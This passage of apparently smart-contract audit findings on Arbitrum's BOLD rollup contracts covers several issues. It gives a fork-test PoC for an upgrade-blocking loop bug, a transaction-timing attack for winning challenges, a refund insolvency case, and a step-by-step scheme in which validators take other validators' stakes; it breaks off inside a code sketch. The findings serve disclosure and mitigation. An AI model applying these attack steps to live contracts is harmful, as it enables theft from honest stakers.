The good thing is that, in the worst case, the old rollup logic can be upgraded again to resolve the issue.

Tools Used

Manual Review

Recommended Mitigation Steps

There are two ways to resolve the issue:

  1. Resume/unpause the old rollup contract at the end of the upgrade:
    function cleanupOldRollup() private {
        IOldRollupAdmin(address(OLD_ROLLUP)).pause();
        ...
        IOldRollupAdmin(address(OLD_ROLLUP)).resume();
    }
  2. Remove the whenNotPaused modifier from the completeChallenge function in the PR:

https://github.com/OffchainLabs/nitro-contracts/pull/48/files

Assessed type

Invalid Validation

`BOLDUpgradeAction.sol` will fail to upgrade contracts due to error in the `perform` function

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/BOLDUpgradeAction.sol#L350-L359

Vulnerability details

Impact

An error in the BOLDUpgradeAction.sol contract prevents it from upgrading and deploying new BOLD contracts.

Proof of Concept

The perform function serves as the entry point in the BOLDUpgradeAction.sol and is responsible for migrating stakers from the old rollup and deploying the challenge manager with a new rollup contract.

One of the first subroutines in this function is the cleanupOldRollup().

    function perform(address[] memory validators) external {
        // tidy up the old rollup - pause it and refund stakes
        cleanupOldRollup();

This subroutine pauses the old rollup contract and attempts to refund existing stakers.

    function cleanupOldRollup() private {
        IOldRollupAdmin(address(OLD_ROLLUP)).pause();

>>      uint64 stakerCount = ROLLUP_READER.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
            stakerCount = 50;
        }
        for (uint64 i = 0; i < stakerCount; i++) {
>>          address stakerAddr = ROLLUP_READER.getStakerAddress(i);
            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }
        }

        // upgrade the rollup to one that allows validators to withdraw even whilst paused
        DoubleLogicUUPSUpgradeable(address(OLD_ROLLUP)).upgradeSecondaryTo(IMPL_PATCHED_OLD_ROLLUP_USER);
    }

This function contains a bug that prevents execution of the subsequent procedures. Let's check the forceRefundStaker in the old rollup contract.

According to:
https://docs.arbitrum.io/build-decentralized-apps/reference/useful-addresses

Proxy: https://etherscan.io/address/0x5eF0D09d1E6204141B4d37530808eD19f60FBa35
Implementation: https://etherscan.io/address/0x72f193d0f305f532c87a4b9d0a2f407a3f4f585f#code

RollupAdminLogic.sol

    function forceRefundStaker(address[] calldata staker) external override whenPaused {
        require(staker.length > 0, "EMPTY_ARRAY");
        for (uint256 i = 0; i < staker.length; i++) {
            require(_stakerMap[staker[i]].currentChallenge == NO_CHAL_INDEX, "STAKER_IN_CHALL");
            reduceStakeTo(staker[i], 0);
>>          turnIntoZombie(staker[i]);
        }
        emit OwnerFunctionCalled(22);
    }

RollupCore.sol

    function turnIntoZombie(address stakerAddress) internal {
        Staker storage staker = _stakerMap[stakerAddress];
        _zombies.push(Zombie(stakerAddress, staker.latestStakedNode));
>>      deleteStaker(stakerAddress);
    }

    function deleteStaker(address stakerAddress) private {
        Staker storage staker = _stakerMap[stakerAddress];
        require(staker.isStaked, "NOT_STAKED");
        uint64 stakerIndex = staker.index;
        _stakerList[stakerIndex] = _stakerList[_stakerList.length - 1];
        _stakerMap[_stakerList[stakerIndex]].index = stakerIndex;
>>      _stakerList.pop();
        delete _stakerMap[stakerAddress];
    }

From the above code, it is evident that the staker's address is eventually deleted from the _stakerList, causing the array to shrink. As a result, the cleanupOldRollup function will throw an "array out-of-bounds" error, because it keeps iterating up to the original staker count while the array shrinks beneath it.
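The failure mode can be reproduced in the abstract with a minimal simulation (a Python sketch of the swap-and-pop pattern, not the actual contract code):

```python
# Model of cleanupOldRollup: iterate up to a snapshotted staker count
# while each refund swap-and-pops the staker out of the list.
stakers = ["staker0", "staker1", "staker2"]  # all staked, none in a challenge

def force_refund(addr):
    # mirrors deleteStaker: overwrite with the last element, then pop
    i = stakers.index(addr)
    stakers[i] = stakers[-1]
    stakers.pop()

staker_count = len(stakers)  # snapshot, like ROLLUP_READER.stakerCount()
out_of_bounds = False
try:
    for i in range(staker_count):
        addr = stakers[i]  # fails once i >= len(stakers)
        force_refund(addr)
except IndexError:
    out_of_bounds = True

print(out_of_bounds)  # True: the list shrank below the snapshotted count
```

The same shrink-while-iterating shape is what makes the Solidity loop panic with an out-of-bounds access.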

Coded POC: we use a mainnet fork and reproduce only the cleanupOldRollup logic.

// SPDX-License-Identifier: MIT
pragma solidity 0.8.17;

import {Test} from "forge-std/Test.sol";
import "forge-std/console.sol";

struct OldStaker {
    uint256 amountStaked;
    uint64 index;
    uint64 latestStakedNode;
    // currentChallenge is 0 if staker is not in a challenge
    uint64 currentChallenge; // 1. cannot have current challenge
    bool isStaked; // 2. must be staked
}

interface IOldRollup {
    function pause() external;
    function forceRefundStaker(address[] memory staker) external;
    function getStakerAddress(uint64 stakerNum) external view returns (address);
    function stakerCount() external view returns (uint64);
    function getStaker(address staker) external view returns (OldStaker memory);
}

contract C4 is Test {
    IOldRollup oldRollup;
    address admin;
    function setUp() public {
        uint256 forkId = vm.createFork("https://rpc.ankr.com/eth");
        vm.selectFork(forkId);
        oldRollup = IOldRollup(0x5eF0D09d1E6204141B4d37530808eD19f60FBa35);
        admin = 0x3ffFbAdAF827559da092217e474760E2b2c3CeDd;
    }

    function test_Cleanup() public {
        vm.startPrank(admin);
        oldRollup.pause();
        uint64 stakerCount = oldRollup.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
            stakerCount = 50;
        }
        for (uint64 i = 0; i < stakerCount; i++) {
            // FAILS with panic: array out-of-bounds access 
            address stakerAddr = oldRollup.getStakerAddress(i);
            OldStaker memory staker = oldRollup.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;
                oldRollup.forceRefundStaker(stakersToRefund);
            }
        }
    }
}

Tools Used

Foundry

Recommended Mitigation Steps

    function cleanupOldRollup() private {
        IOldRollupAdmin(address(OLD_ROLLUP)).pause();

        uint64 stakerCount = ROLLUP_READER.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
            stakerCount = 50;
        }
-       for (uint64 i = 0; i < stakerCount; i++) {
+       for (uint64 i = 0; i < stakerCount;) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(i);
            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
+               stakerCount -= 1;
+           } else {
+               i++;
+           }
        }
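
As a sanity check on the pattern, the corrected loop terminates and visits every staker under the same swap-and-pop model (a Python sketch, assuming every staker is eligible for a refund):

```python
stakers = ["staker0", "staker1", "staker2"]
refunded = []

def force_refund(addr):
    # swap-and-pop, as in the old rollup's deleteStaker
    i = stakers.index(addr)
    stakers[i] = stakers[-1]
    stakers.pop()
    refunded.append(addr)

staker_count = len(stakers)
i = 0
while i < staker_count:
    addr = stakers[i]
    # in the real fix, the refund branch only runs for staked,
    # unchallenged stakers; otherwise i is incremented instead
    force_refund(addr)
    staker_count -= 1  # the list shrank, so do not advance i

print(sorted(refunded))  # every staker refunded, no out-of-bounds access
```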

Assessed type

DoS

Winning a challenge by engineering time

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/EdgeChallengeManager.sol#L511

Vulnerability details

Impact

If the difference between challengePeriodBlocks and the total unrivaled time of a malicious assertion claim is less than the delay between sending a transaction and mining that transaction, the malicious assertion claim will always win regardless of the total unrivaled time of the valid assertion claim.

Proof of Concept

Please have a look at the following time demonstration for better understanding:

 ---- t1 ---- t1 + k ---- t1 + tH ---- t1 + tH + tA ---- t1 + k + tH ---- t1 + tH + tA + k ---- t1 + k + tH + k ----> t

    Honest    Honest       Evil         Evil               Honest               Evil                  Honest
    Create    Create       Rival &      Confirm            Confirm              Confirm               Confirm
                           Create
    Send      Mined        Send         Send               Send                 Mined                 Mined

                                                           Evil
                                                           Rival &
                                                           Create
                                                           Mined
  • challengePeriodBlocksInTime: challengePeriodBlocks expressed in time (seconds).
  • t1: the time at which an honest party sends a tx creating an edge (whether creating a layer zero edge or bisecting an edge at any level).
  • k: the delay between a tx being sent and being mined on Ethereum.
  • t1 + k: the time at which the honest party's edge creation tx is mined.
  • tH: the remaining unrivaled time the honest party needs to win by confirming the valid assertion claim by time. totalUnrivaledTimeInTime(valid assertion claim) = challengePeriodBlocksInTime - tH
  • t1 + tH: the time at which the evil party sends the tx rivaling the honest party's edge and creating a new edge. This tx is mined at t1 + k + tH.
  • tA: the remaining unrivaled time the evil party needs to win by confirming the malicious assertion claim by time. totalUnrivaledTimeInTime(malicious assertion claim) = challengePeriodBlocksInTime - tA
  • t1 + tH + tA: the time at which the evil party sends the confirmation tx (confirmEdgeByTime) for the malicious assertion claim.
  • t1 + k + tH: the time at which the honest party sends the confirmation tx (confirmEdgeByTime) for the valid assertion claim; also the time at which the evil party's rival and new edge creation tx is mined.
  • t1 + tH + tA + k: the time at which the evil party's confirmation tx is mined.
  • t1 + k + tH + k: the time at which the honest party's confirmation tx is mined.

   function confirmEdgeByTime(bytes32 edgeId, AssertionStateData calldata claimStateData) public {
       ChallengeEdge storage topEdge = store.get(edgeId);
       if (!topEdge.isLayerZero()) {
           revert EdgeNotLayerZero(topEdge.id(), topEdge.staker, topEdge.claimId);
       }

       uint64 assertionBlocks = 0;
       // if the edge is block level and the assertion being claimed against was the first child of its predecessor
       // then we are able to count the time between the first and second child as time towards
       // the this edge
       bool isBlockLevel = ChallengeEdgeLib.levelToType(topEdge.level, NUM_BIGSTEP_LEVEL) == EdgeType.Block;
       if (isBlockLevel && assertionChain.isFirstChild(topEdge.claimId)) {
           assertionChain.validateAssertionHash(
               topEdge.claimId,
               claimStateData.assertionState,
               claimStateData.prevAssertionHash,
               claimStateData.inboxAcc
           );
           assertionBlocks = assertionChain.getSecondChildCreationBlock(claimStateData.prevAssertionHash)
               - assertionChain.getFirstChildCreationBlock(claimStateData.prevAssertionHash);
       }

       uint256 totalTimeUnrivaled = store.confirmEdgeByTime(edgeId, assertionBlocks, challengePeriodBlocks);

       emit EdgeConfirmedByTime(edgeId, store.edges[edgeId].mutualId(), totalTimeUnrivaled);
   }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/EdgeChallengeManager.sol#L511

Happy Scenario:

Suppose the total unrivaled time of the valid assertion claim is challengePeriodBlocksInTime - tH, so if the evil party delays rivaling an edge by just tH more seconds, the honest party will win and can confirm the valid assertion claim by time by calling confirmEdgeByTime.

  • The honest party sends a tx to create an edge (whether creating a layer zero edge or bisecting an edge at any level) at time t1.
  • This tx is mined k seconds later, at t1 + k.
  • The evil party does not rival this edge, so its timer ticks in favor of the honest party.
  • When the delay in rivaling this edge reaches tH, the honest party sees that the total unrivaled time of the valid assertion claim is now challengePeriodBlocksInTime - tH + tH = challengePeriodBlocksInTime, so he is able to win by confirming it by time. So, the honest party sends a confirmEdgeByTime tx at t1 + k + tH to confirm the valid assertion claim.
  • This tx is mined at t1 + k + tH + k. The valid assertion claim is confirmed, and the honest party wins.

Unhappy Scenario:

Suppose the total unrivaled time of the valid assertion claim is challengePeriodBlocksInTime - tH, so if the evil party delays rivaling an edge by just tH more seconds, the honest party will win and can confirm the valid assertion claim by time by calling confirmEdgeByTime.

Moreover, suppose the total unrivaled time of the malicious assertion claim is challengePeriodBlocksInTime - tA, so if the honest party delays rivaling an edge by just tA more seconds, the evil party will win and can confirm the malicious assertion claim by time by calling confirmEdgeByTime.

  • The honest party sends a tx to create an edge (whether creating a layer zero edge or bisecting an edge at any level) at time t1.
  • This tx is mined k seconds later, at t1 + k.
  • The evil party does not yet rival this edge, so its timer ticks in favor of the honest party.
  • The evil party sends a tx to rival this edge and create a new edge at t1 + tH.
  • The evil party sends a confirmEdgeByTime tx at t1 + tH + tA to confirm the malicious assertion claim.
  • When the delay in rivaling the edge reaches tH, the honest party sees that the total unrivaled time of the valid assertion claim is now challengePeriodBlocksInTime - tH + tH = challengePeriodBlocksInTime, so he is able to win by confirming it by time. So, the honest party sends a confirmEdgeByTime tx at t1 + k + tH to confirm the valid assertion claim.
  • The evil party's edge creation tx is mined at t1 + tH + k. It rivals the honest party's edge and creates a new edge.
  • The evil party's confirmEdgeByTime tx is mined at t1 + tH + tA + k, earlier than the honest party's confirmation tx. So, the malicious assertion claim is confirmed, and the evil party wins.
  • The honest party's confirmEdgeByTime tx is mined at t1 + k + tH + k, but it reverts because its rival is already confirmed.

Even if the honest party rivals the evil party's edge at time t1 + k + tH, that tx is mined at t1 + k + tH + k, which is too late because the evil party's confirmation tx is mined at t1 + k + tH + tA.

The only condition is that tA <= k.

Example 1 (where tA < tH):

 -- 604000 -- 604048 ---- 604100 ------- 604124 ---------- 604148 -------- 604172 ----------------- 604196 ----> t

 ---- t1 ---- t1 + k ---- t1 + tH ---- t1 + tH + tA ---- t1 + k + tH ---- t1 + tH + tA + k ---- t1 + k + tH + k ----> t

    Honest    Honest       Evil         Evil               Honest               Evil                  Honest
    Create    Create       Rival &      Confirm            Confirm              Confirm               Confirm
                           Create
    Send      Mined        Send         Send               Send                 Mined                 Mined

                                                           Evil
                                                           Rival &
                                                           Create
                                                           Mined   
  • challengePeriodBlocksInTime = 604800 (7 days)
  • tH: 100
  • tA: 24
  • k: 48

The honest party creates an edge at time 604000, and it is mined at 604000 + 48 = 604048. The total unrivaled time of the valid assertion claim is 604700, so if the evil party delays 100 seconds, the honest party can confirm the valid assertion claim. Moreover, the total unrivaled time of the malicious assertion claim is 604776, so if the honest party delays 24 seconds, the evil party can confirm the malicious assertion claim.

Evil party sends a tx at 604000 + 100 = 604100 to rival the honest party's edge and also creates a new edge. Then the evil party sends a tx at 604000 + 100 + 24 = 604124 to confirm the malicious assertion claim.

The honest party notices at 604000 + 48 + 100 = 604148 that the total unrivaled time of valid assertion claim is now 604700 + (604148 - (604000 + 48)) = 604800 which is equal to challengePeriodBlocksInTime. So, he sends the tx to confirm the valid assertion claim.

The evil party's rival and new edge creation tx is mined at 604000 + 48 + 100 = 604148.

The evil party's confirmation tx is mined at 604000 + 48 + 100 + 24 = 604172. This tx succeeds because, by the time it is mined, the total unrivaled time of the malicious assertion claim has increased by 24, making the total 604800 = challengePeriodBlocksInTime. So, the malicious assertion claim is confirmed, and the evil party wins.

The honest party's confirmation tx, mined at 604000 + 48 + 100 + 48 = 604196, fails because its rival is already confirmed.
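The timeline of Example 1 can be checked with a few lines of arithmetic (Python, using the values above):

```python
# Example 1 values, all in seconds
t1, k, tH, tA = 604000, 48, 100, 24

honest_create_mined  = t1 + k                   # 604048
evil_rival_sent      = t1 + tH                  # 604100
evil_confirm_sent    = t1 + tH + tA             # 604124
honest_confirm_sent  = t1 + k + tH              # 604148
evil_confirm_mined   = evil_confirm_sent + k    # 604172
honest_confirm_mined = honest_confirm_sent + k  # 604196

# because tA <= k, the evil confirmation is mined first
print(evil_confirm_mined < honest_confirm_mined)  # True
```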

Example 2 (where tA > tH):

 -- 604000 -- 604005 ------- 604029 -------- 604048 ------ 604053 -------- 604077 ------------------ 604101 ----> t

 ---- t1 ---- t1 + tH ---- t1 + tH + tA ---- t1 + k ---- t1 + k + tH ---- t1 + tH + tA + k ---- t1 + k + tH + k ----> t

    Honest    Evil          Evil            Honest            Honest              Evil                  Honest
    Create    Rival &       Confirm         Create            Confirm             Confirm               Confirm
              Create             
    Send      Send          Send            Mined             Send                Mined                 Mined

                                                              Evil
                                                              Rival &
                                                              Create
                                                              Mined  
  • challengePeriodBlocksInTime = 604800 (7 days)
  • tH: 5
  • tA: 24
  • k: 48

The honest party creates an edge at time 604000. The total unrivaled time of the valid assertion claim is 604795, so if the evil party delays 5 seconds, the honest party can confirm the valid assertion claim. Moreover, the total unrivaled time of the malicious assertion claim is 604776, so if the honest party delays 24 seconds, the evil party can confirm the malicious assertion claim.

The evil party sends a tx at 604000 + 5 = 604005 to rival the honest party's edge (which has not yet been mined) and to create a new edge. Then the evil party sends a tx at 604000 + 5 + 24 = 604029 to confirm the malicious assertion claim.

The honest party's edge creation is mined at 604000 + 48 = 604048.

The honest party notices at 604000 + 48 + 5 = 604053 that the total unrivaled time of valid assertion claim is now 604795 + (604053 - (604000 + 48)) = 604800 which is equal to challengePeriodBlocksInTime. So, he sends the tx at 604000 + 48 + 5 = 604053 to confirm the valid assertion claim.

The evil party's rival and new edge creation tx is mined at 604000 + 48 + 5 = 604053.

The evil party's confirmation tx is mined at 604000 + 48 + 5 + 24 = 604077. This tx succeeds because, by the time it is mined, the total unrivaled time of the malicious assertion claim has increased by 24, making the total 604800 = challengePeriodBlocksInTime. So, the malicious assertion claim is confirmed, and the evil party wins.

The honest party's confirmation tx, mined at 604000 + 48 + 5 + 48 = 604101, fails because its rival is already confirmed.
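The same check for Example 2's values (Python):

```python
# Example 2 values, all in seconds
t1, k, tH, tA = 604000, 48, 5, 24

evil_rival_sent      = t1 + tH                  # 604005, before the honest edge is even mined
evil_confirm_sent    = t1 + tH + tA             # 604029
honest_create_mined  = t1 + k                   # 604048
honest_confirm_sent  = t1 + k + tH              # 604053
evil_confirm_mined   = evil_confirm_sent + k    # 604077
honest_confirm_mined = honest_confirm_sent + k  # 604101

print(evil_confirm_mined < honest_confirm_mined)  # True: the evil party wins again
```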

Example 3 (where tA < tH & evil party is not precise):

So far, I was assuming that the evil party's rival and new edge creation tx is mined exactly when the honest party's confirmation tx is sent. This was just for simplicity and is not necessary. Here I assume the evil party has a delay of x seconds, where x <= k.

 -- 604000 -- 604048 ------ 604112 ---------- 604136 ------------- 604148 ---------- 604160 ------------- 604184 --------------- 604196 ----> t

 ---- t1 ---- t1 + k ---- t1 + tH + x ---- t1 + tH + tA + x ---- t1 + k + tH -- t1 + tH + x + k -- t1 + tH + tA + x + k --- t1 + k + tH + k ----> t

    Honest    Honest       Evil             Evil                    Honest          Evil               Evil                  Honest
    Create    Create       Rival &          Confirm                 Confirm         Rival &            Confirm               Confirm
                           Create                                                   Create
    Send      Mined        Send             Send                    Send            Mined              Mined                 Mined
  • challengePeriodBlocksInTime = 604800 (7 days)
  • tH: 100
  • tA: 24
  • k: 48
  • x: 12

The honest party creates an edge at time 604000, and it is mined at 604000 + 48 = 604048. The total unrivaled time of the valid assertion claim is 604700, so if the evil party delays 100 seconds, the honest party can confirm the valid assertion claim. Moreover, the total unrivaled time of the malicious assertion claim is 604776, so if the honest party delays 24 seconds, the evil party can confirm the malicious assertion claim.

Evil party sends a tx at 604000 + 100 + 12 = 604112 to rival the honest party's edge and also creates a new edge. Then the evil party sends a tx at 604000 + 100 + 24 + 12 = 604136 to confirm the malicious assertion claim.

The honest party notices at 604000 + 48 + 100 = 604148 that the total unrivaled time of valid assertion claim is now 604700 + (604148 - (604000 + 48)) = 604800 which is equal to challengePeriodBlocksInTime. So, he sends the tx to confirm the valid assertion claim.

The evil party's rival and new edge creation tx is mined at 604000 + 48 + 100 + 12 = 604160.

The evil party's confirmation tx is mined at 604000 + 48 + 100 + 24 + 12 = 604184. This tx succeeds because, by the time it is mined, the total unrivaled time of the malicious assertion claim has increased by 24, making the total 604800 = challengePeriodBlocksInTime. So, the malicious assertion claim is confirmed, and the evil party wins.

The honest party's confirmation tx, mined at 604000 + 48 + 100 + 48 = 604196, fails because its rival is already confirmed.
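And for Example 3, where the evil party is x = 12 seconds imprecise (Python):

```python
# Example 3 values, all in seconds
t1, k, tH, tA, x = 604000, 48, 100, 24, 12

evil_rival_sent      = t1 + tH + x              # 604112
evil_confirm_sent    = t1 + tH + tA + x         # 604136
honest_confirm_sent  = t1 + k + tH              # 604148
evil_rival_mined     = evil_rival_sent + k      # 604160
evil_confirm_mined   = evil_confirm_sent + k    # 604184
honest_confirm_mined = honest_confirm_sent + k  # 604196

# any imprecision x <= k still leaves the evil confirmation mined first
print(evil_confirm_mined < honest_confirm_mined)  # True
```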

The root cause of this issue is the delay between when the honest party sends the confirmation tx and when it is mined. If the evil party engineers the timing so that the confirmation of the malicious assertion claim is mined between these two moments, the evil party always wins in the scenarios where tA <= k. In other words, the attack works whenever the remaining unrivaled time the malicious assertion claim needs in order to be confirmed is at most the delay between sending a tx and its being mined.

In summary, when the honest party notices that the total unrivaled time of the valid assertion claim has met the threshold, he sends the confirmation tx. There is some delay before this tx is mined. If the evil party can get his confirmation of the malicious assertion claim mined during that delay, he wins.

Some important notes:

  • The attack is possible because, when the honest party's confirmation tx is mined, the total unrivaled time of the valid assertion claim equals challengePeriodBlocksInTime + k. In other words, k is extra time the honest party wastes, and this window is exactly when the evil party can confirm the malicious assertion claim. That is why the only condition for this attack is tA <= k.
  • One might assume that sending the confirmation tx k seconds earlier protects the honest party, since it would then be mined k seconds earlier and the evil party's confirmation could not land first. This is not true: the honest party sends the confirmation tx as soon as he observes that the total unrivaled time of the valid assertion claim equals challengePeriodBlocksInTime. If he sent it earlier (while the total unrivaled time was still below challengePeriodBlocksInTime), there would be no guarantee that the evil party does not rival the edge and stop the timer while the tx is pending. So it is reasonable for the honest party to wait until the total unrivaled time of the valid assertion claim equals challengePeriodBlocksInTime before sending the confirmation tx.
  • One might also ask why the honest party does not rival the edge the evil party newly creates. The answer is that the evil party's rival and new edge creation tx is mined at t1 + k + tH or later (explained in example 3), i.e. after the honest party's confirmation tx is already sent. Even if the honest party rivals the newly created edge, that tx is mined k seconds later, which is too late: the evil party's confirmation tx is mined first.
  • For simplicity, time was used instead of block numbers. The attack remains valid with block numbers; simply divide each time by 12 (assuming a block is mined every 12 seconds on Ethereum).
  • The attack works because the evil party knows how the honest party reacts. That is why the evil party sends the confirmation tx at a time when the total unrivaled time of the malicious assertion claim is not yet equal to challengePeriodBlocksInTime (so he is not yet eligible to confirm). But the evil party knows that by the time this tx is mined, the total unrivaled time of the malicious assertion claim will equal challengePeriodBlocksInTime, because he knows the honest party only reacts to an edge once it is mined. So the evil party sends the confirmation tx shortly (tA seconds) after the rival and new edge creation tx.
  • So far, both the valid and malicious assertion claims were shown very close to being confirmable by time, to demonstrate that in a tight game the evil party wins with higher probability. The examples show that the evil party's confirmation tx is always sent before his rival and new edge creation tx is mined, so the honest party only reacts to the new edge once it is mined. Even if the honest party rivals it immediately upon seeing it mined, his tx is mined k seconds later, accumulating k seconds in the evil party's favor. Since the evil party's confirmation tx is sent before his rival and new edge creation tx is mined, it is mined earlier than the honest party's reaction.

Tools Used

Recommended Mitigation Steps

It should be enforced that a confirmation tx cannot be executed until at least k blocks after the latest edge creation tx related to the assertion claim was mined.

uint256 public kInBlocks = 48 / 12; // The delay between sending a tx and being mined in blocks
function confirmEdgeByTime(bytes32 edgeId, AssertionStateData calldata claimStateData) public {
    //....
    ChallengeEdge storage topEdge = store.get(edgeId);

    // this is the block in which the last child edge creation related to this edge id is mined.
    uint lastCreatedEdgeInBlock = topEdge.latestCreatedEdge.createdAtBlock; 

    require(block.number - lastCreatedEdgeInBlock >= kInBlocks, "the confirmation is sent earlier than the edge creation is mined");
}

Assessed type

Context

An error in the accounting of stake refunds could result in insolvency

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/EdgeChallengeManager.sol#L433-L434

Vulnerability details

Impact

Malicious parties who created edge challenges cannot get a refund if the edge was deemed a loser; the protocol sends the stakes of all rivals of a layer zero edge to the excessStakeReceiver. However, if a new challenge manager is deployed during the dispute game and a new edge is created afterwards, it can cause an error in the accounting of stake refunds, resulting in insolvency. Therefore, one or more honest parties won't get their original stake back.

Note: stakes here refer to staking on layer zero edges upon creation.

Proof of Concept

Here is a scenario as an example to illustrate the issue:

Assume we have Bob, Alice, and Mario as participants.
Assume the edge challenge manager contract holds a 5 WETH balance allocated to refund honest participants' stakes on edge challenges.

  • Contract balance => 5 WETH
  • Stake amount at the moment is 1 WETH.
  • Bob creates an edge challenge for an incorrect assertion.
  • Since Bob's edge is the first (unrivaled), 1 WETH is transferred to the edge challenge manager contract:
	address receiver = edgeAdded.hasRival ? excessStakeReceiver : address(this);
	st.safeTransferFrom(msg.sender, receiver, sa);

EdgeChallengeManager.sol#L433-L434

  • Contract balance => 6 WETH
  • Alice creates a rival edge (for another incorrect assertion).
  • 1 WETH will be transferred to excessStakeReceiver
  • a new edge challenge manager is deployed, changing the stake amount to 2 WETH
  • Note that the dispute game is still ongoing (we are within the challenge period window)
  • Mario creates a rival edge (for the correct assertion), utilizing BoLD to protect the chain.
  • Mario's 2 WETH is transferred to the excessStakeReceiver, since his edge has rivals.
  • The game finished, Mario won.
  • Mario calls refundStake to retrieve their stake back (2 WETH)
  • Mario receives 2 WETH
  • Contract balance => 4 WETH

As the numbers show, the contract does not have enough balance to cover the refunds for all honest participants. Thus, one or more honest participants won't get their refund back.
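The balance arithmetic of this scenario can be tallied in a few lines (an illustrative Python ledger; amounts in WETH):

```python
contract = 5          # balance reserved to refund honest participants
excess_receiver = 0

contract += 1         # Bob's first (unrivaled) layer zero edge: stake held in the contract
excess_receiver += 1  # Alice's rival edge: stake forwarded to excessStakeReceiver
excess_receiver += 2  # Mario's rival edge at the new 2 WETH stake amount
contract -= 2         # Mario wins and calls refundStake: paid from the contract

print(contract)  # 4, yet 5 WETH were reserved for honest refunds
```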

Tools Used

Manual analysis

Recommended Mitigation Steps

Instead of sending all stakes after the first one to the excess stake receiver immediately, accumulate the stakes for all rival edges in the contract. Then, on refundStake, refund the winner and send the remainder to the excess stake receiver.
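A sketch of the suggested accounting (hypothetical Python, not the contract): every rival stake is held in the contract until resolution, the winner is refunded first, and only then is the excess forwarded.

```python
contract = 5          # pre-existing balance reserved for honest refunds
excess_receiver = 0
stakes = {"bob": 1, "alice": 1, "mario": 2}

# all stakes, rival or not, accumulate in the contract
for amount in stakes.values():
    contract += amount

# on refundStake: pay the winner, then forward the losing stakes
winner = "mario"
contract -= stakes[winner]
for party, amount in stakes.items():
    if party != winner:
        excess_receiver += amount
        contract -= amount

print(contract)  # 5: the reserved balance is untouched, so no insolvency
```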

Assessed type

Other

Adversary validators can steal staked funds in `RollupUserLogic.sol`

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupAdminLogic.sol#L223-L226

Vulnerability details

Description

Any validator that has lost a challenge in the past can steal funds from the honest validators in RollupUserLogic.sol.
Here is a quick 7-step POC (see below for the coded POC):
Note: Alice and Bob play under the same entity.

1- The adversary validator Bob loses a challenge.
Bob loses 10 Wei here.

2- The honest validator creates the next assertion.

3- The admin calls setBaseStake() to decrease the baseStake state variable,
e.g. from 10 Wei to 8 Wei.

4- Alice invokes newStakeOnNewAssertion() to create the first child of Bob's assertion.
Alice stakes (technically it's a loss at this point) 10 Wei for this.
However, the requiredStake in Alice's assertion configHash is only 8 Wei (Check it here).

5- Bob triggers reduceDeposit() to reduce his staked amount to only 8 Wei.

6- Now, Bob invokes stakeOnNewAssertion() to create the first child of Alice's assertion.

7- Alice invokes returnOldDeposit() to withdraw her 10 Wei, and Bob withdraws his 2 Wei by calling withdrawStakerFunds().

Deep dive

Key points:

  • In RollupUserLogic.sol, when an assertion has two or more children, the protocol keeps only 1 stake per challenge, so the losers' stakes are already sent to the loserStakeEscrow (check here). Therefore, the only funds available in RollupUserLogic come from the honest validators, who can withdraw them once they are no longer active stakers.

  • In the RollupCore system, it is possible to create multiple assertions with only one stake. It uses a structure where assertions are linked, and each new assertion is created based on the state of the previous one. This is why, when an adversary validator loses a challenge, his values in _stakerMap[stakerAddress] are not updated.

  • The setBaseStake() function in the RollupAdminLogic.sol contract updates the baseStake state variable, which is required for posting a claim (aka an assertion) in the RollupUserLogic.sol contract. This function is part of the administrative controls of the rollup system, allowing the rollup administrator to adjust the staking requirements as needed.

  • The baseStake state variable is used in createNewAssertion(); this value defines how much the next assertion must stake (each new assertion is created based on the previous one).

Step by step:

When Bob loses the challenge to the honest validator, he also loses his 10 Wei stake. However, his values in _stakerMap[stakerAddress] are not updated. This is intended by the protocol: the loser's stake cannot be withdrawn unless someone else puts down a stake to unlock it, but that someone's stake would then be locked, so effectively they are paying the original loser.

On the other hand, the honest validator will keep up his good work by posting subsequent assertions.

Until one day the rollup owner decides to decrease the baseStake state variable (more on how the logic handles it HERE).

Note: At this point, any validator who has lost a challenge in the past can do the same as Bob does below.

Back to Bob, His assertion state is still Pending and let's call it the assertion X
Alice will invoke newStakeOnNewAssertion() to create the first child of Bob assertion X
and let's call Alice's assertion Y. Of course, she will stake 10 Wei and Bob will be able to withdraw his 10 Wei (But Bob will not withdraw his 10 Wei now)

The reason why we need to create assertion Y. is because it will use the new value of baseStake in the configHash of assertion Y (this will help the adversary validator to unlock Alice's stake).

Now, Bob will trigger reduceDeposit() to reduce his amount staked to only 8 Wei (This 8 Wei he will use it to unlock 10 Wei of Alice). The other 2 Wei are unstacked and he can withdraw them anytime.

Bob will call stakeOnNewAssertion() to create the first child of Alice assertion Y
BUT, this time he will stake only 8 Wei (Why? Check this again)

As a result of this:
1- Alice will withdraw her 10 Wei.
2- Bob will withdraw the stolen funds, which is 2 Wei in this POC.
Note: The 2 Wei come from the honest validators' staked funds.
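The arithmetic of the steps above can be sketched as a small accounting model (an illustrative Python sketch, not the contract's actual logic; all variable names are mine):

```python
# Simplified accounting sketch of the steps above (illustrative model, not contract code).
OLD_BASE_STAKE = 10  # baseStake when Bob lost his challenge
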